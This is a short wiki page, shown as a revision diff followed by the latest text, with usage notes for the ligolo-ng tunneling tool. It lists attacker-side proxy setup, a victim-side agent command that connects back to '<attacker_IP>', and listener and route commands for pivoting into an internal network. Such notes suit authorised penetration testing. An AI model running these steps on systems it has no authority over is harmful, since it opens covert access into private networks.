(Created page with "== Usage: == Attacker:<syntaxhighlight lang="powershell"> sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up ./proxy -selfcert </syntaxhighlight>Victim:<syntaxhighlight lang="powershell"> ./agent -connect <attacker_IP>:11601 -ignore-cert </syntaxhighlight>Start the tunneling:<syntaxhighlight lang="powershell"> session 1 Start </syntaxhighlight>Add Listener:<syntaxhighlight lang="powershell"> listener_add --addr 0.0.0.0:1234 --to 127.0....") |
No edit summary |
||
(One intermediate revision by the same user not shown) | |||
Line 1: | Line 1: | ||
== Video Demo: == | |||
<syntaxhighlight lang="powershell"> | |||
https://youtu.be/DM1B8S80EvQ | |||
</syntaxhighlight> | |||
== Download: == | |||
<syntaxhighlight lang="powershell"> | |||
https://github.com/nicocha30/ligolo-ng | |||
</syntaxhighlight> | |||
== Usage: == | == Usage: == | ||
Attacker:<syntaxhighlight lang="powershell"> | Attacker:<syntaxhighlight lang="powershell"> |
Latest revision as of 05:21, 21 August 2023
Video Demo:
https://youtu.be/DM1B8S80EvQ
Download:
https://github.com/nicocha30/ligolo-ng
Usage:
Attacker:
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
Victim:
./agent -connect <attacker_IP>:11601 -ignore-cert
Start the tunneling:
session 1
Start
Add Listener:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
Add IP routes
sudo ip route add 192.168.0.0/24 dev ligolo